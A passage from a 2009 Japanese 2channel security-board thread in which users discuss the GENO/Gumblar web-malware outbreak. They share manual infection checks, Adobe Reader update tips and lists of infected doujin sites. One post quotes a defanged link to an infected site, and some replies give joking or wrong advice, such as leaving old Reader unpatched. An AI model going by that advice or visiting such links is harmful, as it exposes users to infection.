とおもったけどセフだったこえぇよー
603:名無しさん@お腹いっぱい。
09/05/16 01:37:06
>>593
なるほど
無知なうえノートン先生くらいしかないのに
よく感染してなかったな…
604:578
09/05/16 01:37:19
>>598
BIOSってパソコン起動しなくても調べられますか?
ぐぐってみたんですが
パソコンを起動してからの調べ方しか見つからなかったです。
初心者な質問で申し訳ありません。
605:名無しさん@お腹いっぱい。
09/05/16 01:37:49
酷い有様になってきてるね。
インフルエンザと一緒で初期対応を誤ると
あっという間に拡散して取り返しが付かなくなる良い例だ
GENOがもう少しまともな対応をしていれば
まだマシだったろうがもう手遅れ
606:名無しさん@お腹いっぱい。
09/05/16 01:39:40
>>597
豚乙
607:名無しさん@お腹いっぱい。
09/05/16 01:39:40
>>604
URLリンク(www.s124.net)
URLリンク(www.s124.net)
自分でコード表見た方が早いんじゃね
音は書き込めないしw
608:名無しさん@お腹いっぱい。
09/05/16 01:40:37
>>605
キャッシュ消して発言がもうアレすぎ
609:名無しさん@お腹いっぱい。
09/05/16 01:41:24
セキュ板とはとても思えんスレだなぁ
610:名無しさん@お腹いっぱい。
09/05/16 01:42:56
>>608
まるで豚インフルが確認された時のメキシコの対応のようだw
611:名無しさん@お腹いっぱい。
09/05/16 01:42:59
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ消しゃーいいんだよ!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
612:名無しさん@お腹いっぱい。
09/05/16 01:43:24
>>604
筐体を開けてマザーボードを見ると
AwardとかAmiとかphoenixとか書かれているシーツつきROMがある。
ただしノートだと筐体開けると保障が聞かなくなる場合がある
613:名無しさん@お腹いっぱい。
09/05/16 01:45:28
環境作ったけど、テストするURLがわからん!
614:名無しさん@お腹いっぱい。
09/05/16 01:46:45
もしGENOに感染してれば、>>578さんがAdobe reader を介さないで感染した
初の表出例になるのかな。
615:578
09/05/16 01:49:33
今電源入れてみたら起動しました!
avastが今ウィルスチェックしてるのでそれが終わって
このウィルスのようだったら書き込みます。お騒がせしてすみませんでした。
616:名無しさん@お腹いっぱい。
09/05/16 01:50:20
ここIDねーのか・・・
617:名無しさん@お腹いっぱい。
09/05/16 01:50:40
', ;l: ll kr'´ ィイィ彳彳彳彳
ヾ州ィイイィ彳彳彡彡彡
_ __ ,′ ``ヾミミミ
,. '´;:.:.:.:.::::::::.:.:.``ヽ ,′ -‐ミミヽ/ミミミミミ
,. '´..:.:.:,. -─‐‐- 、;;;:;:.:ヽ〈 ,′ミミミミヽ
/ .:.:.:.:.:.く ``ヾ「ヽヽヾミニ二二ミヽ `ヾミミミ
./ .:.:.:.:::::::::::::〉 ∠二二ニ彡' V/ T TTにニニニニニニニニニ====
/ .:.:.:.:::::::::::::::/ -='ぐ / l ||¨´ ̄`` . :;
/ .:.:.:.::::::::::::::::/ '''´ ̄` / `Y´ . ;..:
,′.:.:.:.:::::::::::::〈 ヽ____ノ', .;: .;:
i .:.:.::::::::::::::::::::::', ,;;;'ハミミミヽヽ .,.:; .; :.;:.
',.:.:.:.:/´ ̄`ヽ;;;', .;;;' ``ヾミヽ j! ,. ′.;: .;:. :
',.:.:.:ヽ い( ミj! )ミミj 、 、 ', ., 、:, 、 .; :.
',;;;:;:;:入 _ ..:;.;:.:;..:`Y ミj! 、 、 ', ., 、:, 、
';;;:;:.: `フ´ _ノ . ;: .;: .; :. ;:. ;:.`Y´ 、 、 ', ., 、:, ,. '´
Lノ´ ̄ , ィ´ .:; .:; . ;:. ;:. ;: .;: .; :. ;:. ;} 、 、 ', ., 、:,,.: '´
ノノ ____\ ;.: .;: . :;. :;. :;. :; .;: .;: .;人 _; :; :; ィ´`ヾ
,. '´  ̄ ̄``¨¨ー',:;;,,:,;:,;,. '´ /;;;;;;;;;;;;;;;/ ',
618:名無しさん@お腹いっぱい。
09/05/16 01:51:00
>>21
avastはヒューリスティック最大にしておかないとダメなんじゃなかったっけ
デフォルト設定だと普通に感染するでしょ?
619:名無しさん@お腹いっぱい。
09/05/16 01:51:26
うちのPC起動すると「ピッ」てビープ音する
620:名無しさん@お腹いっぱい。
09/05/16 01:52:07
>>615
感染してないことを祈るよ
もしadobe readerなしで感染してたらorz
621:名無しさん@お腹いっぱい。
09/05/16 01:52:45
>>618
>>21はテンプレ作成前の先走り汁ですね。
>>24とペアで参照のこと。
622:名無しさん@お腹いっぱい。
09/05/16 01:52:46
4回連続で鳴るって言ってるから
起動のときの音とは違うだろ
623:名無しさん@お腹いっぱい。
09/05/16 01:52:49
入れてるウィルスソフトアンインストールしてavast入れた方がいい?
共存はまずいんだよね?NOD32なんだが
624:名無しさん@お腹いっぱい。
09/05/16 01:53:47
メモリかなんかにホコリ溜まってるとか
なんかパーツが抜けかけてるとかじゃねーの
625:名無しさん@お腹いっぱい。
09/05/16 01:53:56
>>623
とりあえずそれ以外でできる最善の方法とってれば今の所は大丈夫そう
626:名無しさん@お腹いっぱい。
09/05/16 01:55:42
>>613
>>523
627:名無しさん@お腹いっぱい。
09/05/16 01:56:15
完全な予防ってVista以外じゃ出来ないのか…
こええなあ…
628:名無しさん@お腹いっぱい。
09/05/16 01:57:33
URLリンク(up2.pandoravote.net)
629:名無しさん@お腹いっぱい。
09/05/16 02:01:04
adobe readerの更新ページ死んでるんだけど?
630:名無しさん@お腹いっぱい。
09/05/16 02:02:43
VistaでもUAC切ってればだめんしょ?
631:名無しさん@お腹いっぱい。
09/05/16 02:03:38
●個人情報お祭り中●
docomo 2009夏モデル Part22
スレリンク(keitai板)
632:名無しさん@お腹いっぱい。
09/05/16 02:03:38
Adobe Reader/Acrobatの脆弱性対策を考える
URLリンク(internet.watch.impress.co.jp)
633:名無しさん@お腹いっぱい。
09/05/16 02:03:47
>>629
マジ?
634:名無しさん@お腹いっぱい。
09/05/16 02:06:05
勝手に改竄されるソースってどういうのかわかる?
635:名無しさん@お腹いっぱい。
09/05/16 02:06:10
リアルでも渡航歴のない人間が豚インフルに感染濃厚だって・・・
636:名無しさん@お腹いっぱい。
09/05/16 02:07:27
怖くてもう寝れねーーーーーーーーー
637:名無しさん@お腹いっぱい。
09/05/16 02:07:37
>>635
さっきテレビのニュース速報やってた
638:名無しさん@お腹いっぱい。
09/05/16 02:08:55
もう怖くてネットサーフィンできねぇ
しばらく専ブラ使って2ちゃんだけの生活にするか
639:名無しさん@お腹いっぱい。
09/05/16 02:09:53
Windowsなんか捨ててMacにしろ、な
640:名無しさん@お腹いっぱい。
09/05/16 02:10:08
ネットもお外も大変な事になってますな
641:名無しさん@お腹いっぱい。
09/05/16 02:10:21
GENOの鯖ってMacで感染したんじゃなかったっけ
642:名無しさん@お腹いっぱい。
09/05/16 02:11:14
Adobeはどうしようもないな
643:名無しさん@お腹いっぱい。
09/05/16 02:11:34
ネットゲームに関してはどうなのこれ
644:名無しさん@お腹いっぱい。
09/05/16 02:11:42
Macはウィルスに感染しないし
使い勝手もいい、それに目にもやさしいし
使いつづければ筋力もつく、最高だよ
645:名無しさん@お腹いっぱい。
09/05/16 02:12:09
同人スレみてきたけどこれもう相当数のサイトが感染してそうだな
1000じゃきかないか
グーグル使えねえよちきしょー
646:名無しさん@お腹いっぱい。
09/05/16 02:12:11
アドビスレ
647:名無しさん@お腹いっぱい。
09/05/16 02:12:34
Site Area Temporarily Unavailable
> システムメインテナンスのため本サービスを一時停止しております。ご利用の皆様には
> ご不便をおかけして大変申し訳ございません。メインテナンス作業が終り次第、
> サービスを開始できるよう準備を進めておりますので、今しばらくお待ち下さいますよう
> お願いいたします。
URLリンク(get.adobe.com)
648:名無しさん@お腹いっぱい。
09/05/16 02:13:16
vistaと7は大丈夫って聞いたけどそれは確定なの?
なんか三日前からパソコンくそ重いんだが…
守ってんのノートン先生だし不安すぎる
649:名無しさん@お腹いっぱい。
09/05/16 02:13:32
逃げたなアドビ
650:名無しさん@お腹いっぱい。
09/05/16 02:13:35
2ちゃんをjaneでやる分には問題ないよな・・・
詳しくないし万が一感染したら初期化とかめんどいし
651:名無しさん@お腹いっぱい。
09/05/16 02:13:58
静かになるまではネットは必要以上に使わないようにするか
652:名無しさん@お腹いっぱい。
09/05/16 02:14:03
>>644
恋人も出来るしな
653:名無しさん@お腹いっぱい。
09/05/16 02:14:45
いや恋人はできん
654:名無しさん@お腹いっぱい。
09/05/16 02:16:09
フラッシュとリーダーをアンインスコしたら平和にならね?
655:名無しさん@お腹いっぱい。
09/05/16 02:20:57
adoveが現行の9.1じゃなくて9のまんまなら大丈夫かね?
一応javaは切ったが
656:名無しさん@お腹いっぱい。
09/05/16 02:21:42
9.1がヤバイの?
古い方がいいの?
657:名無しさん@お腹いっぱい。
09/05/16 02:22:36
まるで初心者の駆け込み所
658:名無しさん@お腹いっぱい。
09/05/16 02:23:01
この脆弱性は、
Adobe ReaderおよびAdobe Acrobatの
現行バージョンであるバージョン9.1および
8.1.4と、
旧バージョン(7.1.1以前)に影響があり、
Windows版、Mac版、Linux版の
すべてが影響を受けるとしている
659:名無しさん@お腹いっぱい。
09/05/16 02:23:27
すこしはテンプレから嫁w
660:名無しさん@お腹いっぱい。
09/05/16 02:23:38
>>491
OSX10.4.11でact2の最新版のインターネットセキュリティバリアX5バックアップエディション使ってるけど
二週間ほど前にトロイの亜種に感染した。こんなの初めてだよまったく。
バックグラウンドから攻めてくるからウイルスバリアのログはまめにチェックした方がいい
あとsafari起動時にdockにエイリアスが立ち上がっては消え立ち上がっては消えと挙動不審になったり
偽装ソフトウエアアップデートの表示が現れ再起動してくださいと出るけど絶対再起動しちゃダメ。
661:名無しさん@お腹いっぱい。
09/05/16 02:23:46
本スレだからこっちで聞けとか言って
色々貼られてるししかたない
662:名無しさん@お腹いっぱい。
09/05/16 02:24:56
>>658
Acrobat Readerは?
663:名無しさん@お腹いっぱい。
09/05/16 02:26:24
あと半年もすれば賢い人らがどうにかしてくれぞガハハ
664:名無しさん@お腹いっぱい。
09/05/16 02:26:25
9.0ってどこで落とせるの?
665:名無しさん@お腹いっぱい。
09/05/16 02:27:25
91いれてからうpでーとで911にしろ
666:名無しさん@お腹いっぱい。
09/05/16 02:28:26
ちょ、スレ加速しすぎ
感染サイトが一気に増えて、被害者も急に増えたのか?
感染サイトを検索サイトで上位に来るように細工をする
感染サイトが正常であるかのごとく、検索サイトに表示されるように細工する
ってのがちょっと面白いな
サイト管理者としては、バレない・バックレ可能なら放置した方がメリットあるわけで。
被害者面して逆切れしてくる奴がいる以上、2chで晒して行くのが対抗策の一つかな
667:名無しさん@お腹いっぱい。
09/05/16 02:29:47
とりあえず下の1~3の手順を意味を理解しなくていいから実行するといいよ。
1.ウィンドウズキー(Windowsのマークのあるキー)を押しながらRキー を押す
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
1個のファイル 50,727バイト と表示されればOK
なんかわかりやすかったから転載しておくね
668:名無しさん@お腹いっぱい。
09/05/16 02:30:02
肝心のうpデートのサイトが死んでるけどな
669:名無しさん@お腹いっぱい。
09/05/16 02:30:13
同人板でコピペまわってたからそれでここに辿り付いた
スレが加速したのはそのせいかと
670:名無しさん@お腹いっぱい。
09/05/16 02:31:10
一応感染してないみたいだけど、2ちゃんは開いてても大丈夫なの?
ニコとかpixivやばいなって書き込みあったけどしばらくは見ない方がいいんだろうか…
671:名無しさん@お腹いっぱい。
09/05/16 02:31:49
sqlsodbc.chmを見たら1323バイトなんだが感染してるのか…?
更新日時は2007年4月17日なんだけど
672:名無しさん@お腹いっぱい。
09/05/16 02:32:02
URLリンク(get.adobe.com)
URLリンク(get.adobe.com)
入れたらReaderはjavascriptを切るのじゃぞ
673:名無しさん@お腹いっぱい。
09/05/16 02:32:12
質悪いのに隠蔽ばっかで騒動にならないし、
むしろこの調子でガンガン初心者にも知識付いた方がいいだろう
674:名無しさん@お腹いっぱい。
09/05/16 02:32:48
もうね危ないからIEをアンインストールしたよ。
これで安心してネットができ……アレ?
675:名無しさん@お腹いっぱい。
09/05/16 02:33:02
>>672
入れてない奴はそもそも入れる必要ねぇだろ
入れてなきゃ大丈夫なんだし
676:名無しさん@お腹いっぱい。
09/05/16 02:33:29
神戸市民だけど何がなんだか
677:名無しさん@お腹いっぱい。
09/05/16 02:33:37
reader8.1.3だったんだが
これはセフセフか?
678:名無しさん@お腹いっぱい。
09/05/16 02:33:56
アップデートはどこですんの?
679:名無しさん@お腹いっぱい。
09/05/16 02:35:52
HTMLに挿入されるjavascriptってどんなのかわかる?
どういうのがあやしい記述なのかわからん
680:名無しさん@お腹いっぱい。
09/05/16 02:35:56
reader6.0.?だったけどうpデート出来ねえからアンインスコした
681:名無しさん@お腹いっぱい。
09/05/16 02:36:07
URLリンク(www.kaspersky.com)
でフルスキャンしてみれ
682:名無しさん@お腹いっぱい。
09/05/16 02:36:11
【レス抽出】
対象スレ:GENOウイルススレ ★4
キーワード:?
抽出レス数:164
683:名無しさん@お腹いっぱい。
09/05/16 02:37:28
URLリンク(www3.atword.jp)
嫁
684:名無しさん@お腹いっぱい。
09/05/16 02:37:55
>>671
自分も同じだ
cmd立ち上がらないし多分感染してる
685:名無しさん@お腹いっぱい。
09/05/16 02:38:47
>>679
それが気になる
686:名無しさん@お腹いっぱい。
09/05/16 02:39:33
別に同人サイトとか見てないし見る予定もないけどなんか怖いな
ひと段落するまではネサフやめるか
687:名無しさん@お腹いっぱい。
09/05/16 02:39:49
>>677
どう見てもold verです
688:名無しさん@お腹いっぱい。
09/05/16 02:40:24
>>671
>>684
アウト
689:名無しさん@お腹いっぱい。
09/05/16 02:40:42
同人ってちんこうpろだ?
690:名無しさん@お腹いっぱい。
09/05/16 02:41:09
同人サイトってなんなの?
どういうサイトのこと?
691:名無しさん@お腹いっぱい。
09/05/16 02:41:11
>>686
一般サイトも感染してんだろ?
692:名無しさん@お腹いっぱい。
09/05/16 02:41:25
Flashの最新って何?更新サイトつながらなくね?
693:名無しさん@お腹いっぱい。
09/05/16 02:42:03
>>688
うっは俺も\(^o^)/オワタ
694:名無しさん@お腹いっぱい。
09/05/16 02:42:26
同人スレより
335 名前:GENO[sage] 投稿日:2009/05/16(土) 02:10:10 ID:pp5Zm/yY0
>>303
感染しているサイトをSourceCheckerOn-lineでチェックしてみると、ほれ、この通り。
so.7walker.net/?site=hうtんtこp://asagaya-drum.com/
難読化されたJavaScriptが<BODY>の前に埋め込まれているのが分かるよね?
同人スレでは「うんこ」が抜けてたため踏んだ人多数
(すでにウィルスは駆除済みらしいが)
695:名無しさん@お腹いっぱい。
09/05/16 02:42:33
>>692 URLリンク(www.adobe.com)
696:名無しさん@お腹いっぱい。
09/05/16 02:42:41
俺もつながらねー
とりあえずavastならおk?
697:名無しさん@お腹いっぱい。
09/05/16 02:42:45
>>679,685
こういうの
URLリンク(detail.chiebukuro.yahoo.co.jp)
698:名無しさん@お腹いっぱい。
09/05/16 02:43:04
とりあえず下の1~3の手順を意味を理解しなくていいから実行するといいよ。
1.ウィンドウズキー(Windowsのマークのあるキー)を押しながらRキー を押す
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
1個のファイル 50,727バイト と表示されればOK
なんかわかりやすかったから転載しておくね
之テンプレに入れようか?
699:名無しさん@お腹いっぱい。
09/05/16 02:43:22
>>696
このスレ最初から読めよ
700:名無しさん@お腹いっぱい。
09/05/16 02:44:09
adobe復活まだかYO
701:名無しさん@お腹いっぱい。
09/05/16 02:44:11
すいません Adobereader9.1.0しか見つからないんですけど
9.1.1ってどこにありますか?
702:名無しさん@お腹いっぱい。
09/05/16 02:44:25
同人スレより転載
【感染の確認方法】
①cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したら②へ
②sqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
③avast!(無料のアンチウイルスソフト)で確認
703:名無しさん@お腹いっぱい。
09/05/16 02:45:21
>>696
Avast!は検体提出するボランティアが優秀なのか
GENOウイルスに関しては対応が最速クラスだね
704:名無しさん@お腹いっぱい。
09/05/16 02:45:43
>>701
よく読めよ9.1に脆弱性があったんだろ
で、それを9.1.1にする必要があるわけだろ
だから、9.1にわざわざする必要はない
しかもアップデートは今落ちてんだろ
705:名無しさん@お腹いっぱい。
09/05/16 02:46:14
>>701
9.1.0をインストール
ヘルプ→アップデートの有無をチェック→9.1.1にアップデート
706:名無しさん@お腹いっぱい。
09/05/16 02:46:36
>>701 readerを起動してヘルプからアップデートの有無をチェックするのじゃ
707:名無しさん@お腹いっぱい。
09/05/16 02:46:39
>>697
怖くて踏めねえw
708:名無しさん@お腹いっぱい。
09/05/16 02:47:07
>>686
>>12
同人サイトなんかお話にならないほどの大手企業サイトが被害にあう&被害を広めてる
709:名無しさん@お腹いっぱい。
09/05/16 02:48:23
>>708
了解
しばらく控えるわ
710:701
09/05/16 02:48:39
インストールしたら英語盤でしたorz
ヘルプのところにアップデートチェックってのがあるんですけどこれですか?
711:名無しさん@お腹いっぱい。
09/05/16 02:48:47
adobeの他のプログラムは大丈夫なん?
プログラムの追加と削除にこんだけあるんだが…(Readerは削除)
Adobe AIR
Adobe Downlode Managar 1.2(削除のみ)
Adobe Flash Player 10 Active
Adobe Flash Player 10 Plugin
Adobe photoshop Album 2.0 mini
Adobe Shockwave Player 11.5
Adobe SVG Viewer 3.0
712:名無しさん@お腹いっぱい。
09/05/16 02:48:56
面倒くせぇから7も8もさっさと9.1にしてバージョンアップ作業すれ
713:名無しさん@お腹いっぱい。
09/05/16 02:49:10
カペルスキーのオンラインスキャンページが強制終了する
714:名無しさん@お腹いっぱい。
09/05/16 02:49:24
710は私じゃないです
アップデートできました
ありがとう
715:名無しさん@お腹いっぱい。
09/05/16 02:50:12
ウイルスに改変されるとサイトのソースはどんなふうに変わるんだ
JSのコードさらしてくれ
716:名無しさん@お腹いっぱい。
09/05/16 02:50:34
アクロバットリーダーの5使ってるんだけど
一気に9.11までアップデートできないのこれ?
717:701
09/05/16 02:51:01
>>710も>>714も俺じゃないんだけど・・・・
>>706
9.1.1にアップデートできました 超サンクス
718:名無しさん@お腹いっぱい。
09/05/16 02:51:03
メルマガ送ってくるんだけど
GENOにまだウイルスいるの?
719:名無しさん@お腹いっぱい。
09/05/16 02:51:08
初心者スレにでもいけよ
720:名無しさん@お腹いっぱい。
09/05/16 02:51:36
>>713 それ多分javaのバージョンが古いんじゃねーかなー??
トレンドマイクロとか試してみ
URLリンク(www.trendflexsecurity.jp)
しまんてっく
URLリンク(www.symantec.com)
721:名無しさん@お腹いっぱい。
09/05/16 02:51:37
>>697はYahoo知恵袋ですよ
問題はその中身
正確に状況を把握できてる人間が1人だけ・・・
722:名無しさん@お腹いっぱい。
09/05/16 02:51:48
sqlsodbc.chmってどこのフォルダ?
723:名無しさん@お腹いっぱい。
09/05/16 02:51:52
>>523
こんな如何にも普通の一般サイトが感染してんのかwww
もう何処も怖くてアクセスできねぇw
724:名無しさん@お腹いっぱい。
09/05/16 02:52:46
>>722
検索しろ
725:名無しさん@お腹いっぱい。
09/05/16 02:52:55
>>722 c:\windows\system32\
726:名無しさん@お腹いっぱい。
09/05/16 02:53:35
なんで急にこんなになだれ込んできたんだ?
同人から来たのか?
727:名無しさん@お腹いっぱい。
09/05/16 02:53:36
>>722
つ 検索
728:名無しさん@お腹いっぱい。
09/05/16 02:53:45
>>724
ごめん聞いたほうがはやいと思って。
素直にググってくるわ
スレ汚しすまそ
729:名無しさん@お腹いっぱい。
09/05/16 02:53:46
>>722
20レス前も見えないのか
730:名無しさん@お腹いっぱい。
09/05/16 02:54:13
>>716
わしも4.0使いなんじゃが・・・更新してみるかのう・・・
731:名無しさん@お腹いっぱい。
09/05/16 02:54:22
>>722
マイコンピュータ⇒Cドライブ⇒WINDOWS⇒system32⇒sqlsodbc.chm
2000とVISTAなら存在しないはず
732:名無しさん@お腹いっぱい。
09/05/16 02:54:26
>>715
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
733:名無しさん@お腹いっぱい。
09/05/16 02:54:29
もうだめだこれw
734:名無しさん@お腹いっぱい。
09/05/16 02:54:36
検索したほうが早いだろw
735:名無しさん@お腹いっぱい。
09/05/16 02:54:51
やべえ観光情報を調べたいのに恐くて2ちゃん以外ネットできねえw
736:名無しさん@お腹いっぱい。
09/05/16 02:55:32
これはJavaScriptやらFlashやらを全く使わないサイトの復興ありうるな
737:名無しさん@お腹いっぱい。
09/05/16 02:55:40
>>711
Flash Playerは最新にしないと危ない
他も基本的には最新にしたほうがいい
使わないソフトはアンインストールしちまえ
738:名無しさん@お腹いっぱい。
09/05/16 02:55:59
>>735
俺もだw
論文書くのに情報集めたいのに
739:名無しさん@お腹いっぱい。
09/05/16 02:55:59
ぱっと見意味がわからんコードがあったら疑えってことか
740:名無しさん@お腹いっぱい。
09/05/16 02:56:07
>>735
旅行の板いけwwwwww
2ってホントに何から何まで揃ってると実感できるいい機会だwww
741:名無しさん@お腹いっぱい。
09/05/16 02:56:11
携帯でネットすればいいんじゃないか
742:名無しさん@お腹いっぱい。
09/05/16 02:56:11
FirefoxとNo Scriptでjavaを切ってクルージングしなよ
743:名無しさん@お腹いっぱい。
09/05/16 02:56:20
おきゃくさんおおすぎだな
744:名無しさん@お腹いっぱい。
09/05/16 02:56:38
検索ってそっちでしたか
>>731
>>725
ありました。50KBでした
745:名無しさん@お腹いっぱい。
09/05/16 02:57:08
>>742
JavaScriptね
746:名無しさん@お腹いっぱい。
09/05/16 02:57:12
語尾にwを付けるやつは死ねばいいと思う
747:名無しさん@お腹いっぱい。
09/05/16 02:57:21
.htmlだけじゃなく.htmもやられる?
HP持ちがもし感染したらhtmにすり替え即告知ができるのか聞きたい
748:名無しさん@お腹いっぱい。
09/05/16 02:57:23
検索ってそっちでしたか(キリッ
749:名無しさん@お腹いっぱい。
09/05/16 02:58:00
>>740
本当に2ちゃんと専ブラに感謝だよ
750:名無しさん@お腹いっぱい。
09/05/16 02:58:19
AIR_SEってフォルダの中に.nwaって拡張子のファイルがあるのは大丈夫なの
751:名無しさん@お腹いっぱい。
09/05/16 02:58:29
>>747
そんなもん関係ない
自分のOSいれなおしてパスワードを変えなきゃ
サイトを修復してもまた改ざんされるよ
752:名無しさん@お腹いっぱい。
09/05/16 02:58:34
ffとノースクリプト?入れればいいの?
効果あるなら入れてみようかな
753:名無しさん@お腹いっぱい。
09/05/16 02:58:37
どこの同人サイトが感染したんだ?ガクガクブルブル
754:名無しさん@お腹いっぱい。
09/05/16 02:58:58
>>747
htmでもダメ。
755:名無しさん@お腹いっぱい。
09/05/16 02:59:07
引っかかってる不幸なヤシをニヤニヤしたいので当スレは誰でもウェルカム・・・!!
756:名無しさん@お腹いっぱい。
09/05/16 02:59:38
今は少しても認知してもらわなきゃって時だろ
お客さん結構
757:名無しさん@お腹いっぱい。
09/05/16 02:59:41
俺がセフレと気持ちよすぎるセクロスしてる最中に何騒いでんだよ?
まだ頑張んなきゃ駄目か?
ちなみにcmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)は勃ちあがった
758:名無しさん@お腹いっぱい。
09/05/16 02:59:41
>>751
ありがとう
かからないようにするのみだな
759:名無しさん@お腹いっぱい。
09/05/16 02:59:41
GENOはもう見ても大丈夫なの?
760:名無しさん@お腹いっぱい。
09/05/16 03:00:34
きんたまみたいにスクショ撮るならニヤニヤできるわな
761:名無しさん@お腹いっぱい。
09/05/16 03:00:35
Reader5とか使ってるやつはアンインストールして、最新を入れろよ。
もしくは何も入れるな。
とっくにサポート対象外なんだよ。
762:名無しさん@お腹いっぱい。
09/05/16 03:00:37
ずいぶん盛況だな
またどっかのサイトが感染したのか?
763:名無しさん@お腹いっぱい。
09/05/16 03:00:52
>>753
今分かってるだけでも
【5月16日1時時点で判明している同人サイト感染状況】
※ここに挙がっていないジャンルも感染が広がっている恐れがあります
エヴァの小説サーチ
ヘタリアの同人サイト
テニミュの同人サイト及びファンサイト
戦国BASARAの同人サイト
リボーンのプチオンリーサイト・同人サイト
おお振りのアンソロサイト
ジョジョの同人サイト
バイオハザードの同人サイト
戦国無双の同人サイト
メガテン(真・女神転生、デビルサマナー、ペルソナ4)の同人サイト
乙女ゲームのVitamin同人サイト
鋼の同人サイト
ガンダム00の同人サイト
幻想水滸伝の同人サイト
忍たま乱太郎の同人サイト
遙かなる時空の中での同人サイト
Fateの同人サイト
サーチも感染してるって報告あるらしいから気をつけろ
764:名無しさん@お腹いっぱい。
09/05/16 03:00:56
カスペ使ってるんだけどavastも一緒にいれても競合しないのか?
765:名無しさん@お腹いっぱい。
09/05/16 03:01:07
botでまーよくここまで
766:名無しさん@お腹いっぱい。
09/05/16 03:01:17
初心者でわからないことだらけだからググって調べようにもネットは自重した方がいいってなると
スレで聞くしかないのかな。あんまり基本的なことだと聞きにくいんだけど
767:名無しさん@お腹いっぱい。
09/05/16 03:01:26
>>759
どう修復したかとか何も発表してないから解決してるか不明だけど
それでもいいなら見れば良いよ
768:名無しさん@お腹いっぱい。
09/05/16 03:01:28
>>755
ヤシって最近聞かないな
769:名無しさん@お腹いっぱい。
09/05/16 03:01:55
すまん、meの場合はどう対処すればいい?
cmd→起動しない、regedit→無事起動、sqlsodbc.chm→存在しない
カスペ→反応なし
なんだけど、ぐぐるがおかしいということも多分ない。
cmdは起動してないけど感染してないと見て大丈夫なのか。
770:名無しさん@お腹いっぱい。
09/05/16 03:02:11
>>766
ぐぐるのが怖い場合もまずはスレ内検索をしてみましょう
771:名無しさん@お腹いっぱい。
09/05/16 03:02:28
2chなかったら気がつかない内に感染してたかもと思うと
>>753
まだまだ報告くる可能性あるから素直に同人板池
772:名無しさん@お腹いっぱい。
09/05/16 03:02:42
>>769
Meは最強だろ
何もしなくてよし
773:名無しさん@お腹いっぱい。
09/05/16 03:02:52
>>769
ケーブル切って投げ捨ててくれ
774:名無しさん@お腹いっぱい。
09/05/16 03:02:55
>>769
そのままの君でいて
775:名無しさん@お腹いっぱい。
09/05/16 03:03:02
>>761
アンインストールして何も入れないほうがいいな。
もしくはアップデートせずに放置
776:名無しさん@お腹いっぱい。
09/05/16 03:03:32
>>764
しないわけねーだろバカ。お前みたいなニワカはカスペなんて使いこなせてないんだろうな。
777:名無しさん@お腹いっぱい。
09/05/16 03:03:36
>>769
Meはcommandでやってみ
778:名無しさん@お腹いっぱい。
09/05/16 03:04:13
5はセキュリティホールあるっぽいから
放置はマズいだろ
779:名無しさん@お腹いっぱい。
09/05/16 03:04:18
>>769
まずMeを窓から投げ捨てるべき
780:名無しさん@お腹いっぱい。
09/05/16 03:05:13
>>769 Windows Me の場合. [スタート]-[プログラム]-[アクセサリ] から [MS-DOS プロンプト] をクリックします。
meはよくわからん
meて
781:名無しさん@お腹いっぱい。
09/05/16 03:05:15
サーチエンジンも感染の可能性っておいおいグーグルも使えないってことか・・・
782:名無しさん@お腹いっぱい。
09/05/16 03:05:18
>>763
こえええええええええええええよ
783:名無しさん@お腹いっぱい。
09/05/16 03:05:20
何だこのスレ…優しい
784:名無しさん@お腹いっぱい。
09/05/16 03:06:03
同人関係で感染ひろがってんだ?
785:名無しさん@お腹いっぱい。
09/05/16 03:06:17
公式で感染してるのは小林だけ?
786:名無しさん@お腹いっぱい。
09/05/16 03:07:02
>>770
もちろんしてるって。でも基本的な用語でもわからないとつまずいちゃうんだよ。
ググれないと辛いものがある
787:名無しさん@お腹いっぱい。
09/05/16 03:07:02
正栄は?
788:名無しさん@お腹いっぱい。
09/05/16 03:07:08
広まるのは同人やってる奴のせいだな
789:名無しさん@お腹いっぱい。
09/05/16 03:07:08
>>737
フラッシュは最新だった
AIRとかSVGviewerとか何のソフトだかいつ落としたかも覚えてないorz
アンインスコしとくわ
790:名無しさん@お腹いっぱい。
09/05/16 03:07:22
>>785
みかか他多数の被害が報告されております
マジでフェーズ6レベル
791:名無しさん@お腹いっぱい。
09/05/16 03:07:33
コミケに集まるあの人数が全員サイト持ちだと考えても恐ろしい数だが、
あれ以上に日本にはオタクがいるわけで…
こわい
792:名無しさん@お腹いっぱい。
